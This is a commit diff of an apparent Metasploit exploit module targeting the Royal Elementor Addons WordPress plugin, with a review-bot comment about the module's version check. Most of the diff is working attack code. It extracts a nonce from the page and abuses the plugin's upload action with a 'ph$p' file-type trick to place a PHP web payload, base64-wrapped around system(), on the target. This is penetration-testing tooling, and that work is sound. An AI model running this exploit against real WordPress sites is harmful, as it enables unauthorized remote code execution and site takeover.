Add suggested changes
parent
31daaf58fe
commit
65ea1188e2
|
@ -59,3 +59,4 @@ bookingpress
|
|||
paid-memberships-pro
|
||||
woocommerce-payments
|
||||
file-manager-advanced-shortcode
|
||||
royal-elementor-addons
|
||||
|
|
|
@ -32,6 +32,10 @@ class MetasploitModule < Msf::Exploit::Remote
|
|||
'Targets' => [['Automatic', {}]],
|
||||
'DisclosureDate' => '2023-11-23',
|
||||
'DefaultTarget' => 0,
|
||||
'DefaultOptions' => {
|
||||
'SSL' => true,
|
||||
'RPORT' => 443
|
||||
},
|
||||
'Privileged' => false,
|
||||
'Notes' => {
|
||||
'Stability' => [CRASH_SAFE],
|
||||
|
@ -40,12 +44,6 @@ class MetasploitModule < Msf::Exploit::Remote
|
|||
}
|
||||
)
|
||||
)
|
||||
|
||||
register_options([
|
||||
OptString.new('TARGETURI', [true, 'The base path to the WordPress application', '/']),
|
||||
OptBool.new('SSL', [true, 'Use SSL/TLS connection', true]),
|
||||
Opt::RPORT(443)
|
||||
])
|
||||
end
|
||||
|
||||
def check
|
||||
|
@ -56,13 +54,13 @@ class MetasploitModule < Msf::Exploit::Remote
|
|||
|
||||
check_code = check_plugin_version_from_readme('royal-elementor-addons', '1.3.79')
|
||||
|
||||
if check_code.code == 'appears'
|
||||
plugin_version = check_code.details[:version]
|
||||
print_good("Detected Royal Elementor Addons version: #{plugin_version}")
|
||||
return CheckCode::Appears
|
||||
if check_code.code != 'appears'
|
||||
return CheckCode::Safe
|
||||
end
|
||||
|
||||
return CheckCode::Safe
|
||||
plugin_version = check_code.details[:version]
|
||||
print_good("Detected Royal Elementor Addons version: #{plugin_version}")
|
||||
return CheckCode::Appears
|
||||
end
|
||||
|
||||
def exploit
|
||||
|
@ -74,15 +72,15 @@ class MetasploitModule < Msf::Exploit::Remote
|
|||
|
||||
data = {
|
||||
'action' => 'wpr_addons_upload_file',
|
||||
'max_file_size' => 0,
|
||||
'max_file_size' => rand(10001),
|
||||
'allowed_file_types' => 'ph$p',
|
||||
'triggering_event' => 'click',
|
||||
'wpr_addons_nonce' => nonce
|
||||
}
|
||||
|
||||
file_content = '<?php '
|
||||
file_content << (payload_instance.arch.include?(ARCH_PHP) ? payload.encoded : "system('#{payload.encoded}');")
|
||||
file_content << ' ?>'
|
||||
file_content << (payload_instance.arch.include?(ARCH_PHP) ? payload.encoded : "system(base64_decode('#{Rex::Text.encode_base64(payload.encoded)}'));")
|
||||
file_content << '?>'
|
||||
|
||||
file_name = "#{Rex::Text.rand_text_alphanumeric(8)}.ph$p"
|
||||
|
||||
|
@ -128,7 +126,7 @@ class MetasploitModule < Msf::Exploit::Remote
|
|||
fail_with(Failure::Unreachable, 'No response received from the target') if res.nil?
|
||||
fail_with(Failure::UnexpectedReply, "Unexpected HTTP response code from the target: #{res.code}") if res.code != 200
|
||||
|
||||
match = res.body.match(/var\s+WprConfig\s*=\s*({.*?});/)
|
||||
match = res.body.match(/var\s+WprConfig\s*=\s*({.+?});/)
|
||||
fail_with(Failure::NoTarget, 'Nonce not found in the response.') if match.nil? || match[1].nil?
|
||||
|
||||
nonce = JSON.parse(match[1])['nonce']
|
||||
|
|
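Review bot: In the `check` hunk (new lines 54-66), the rewritten guard `if check_code.code != 'appears'` returns `CheckCode::Safe` for every other result, so a target whose readme could not be fetched or whose version could not be parsed would be reported as not vulnerable. That is a false negative for anyone relying on the check to confirm patch status. Assuming `check_plugin_version_from_readme` can also return Unknown or Detected codes (its definition is not visible here), the helper's own result should be passed through instead: `return check_code unless check_code.code == 'appears'`. The `def check` line sits in the previous hunk, so the statements between it and this hunk are not shown.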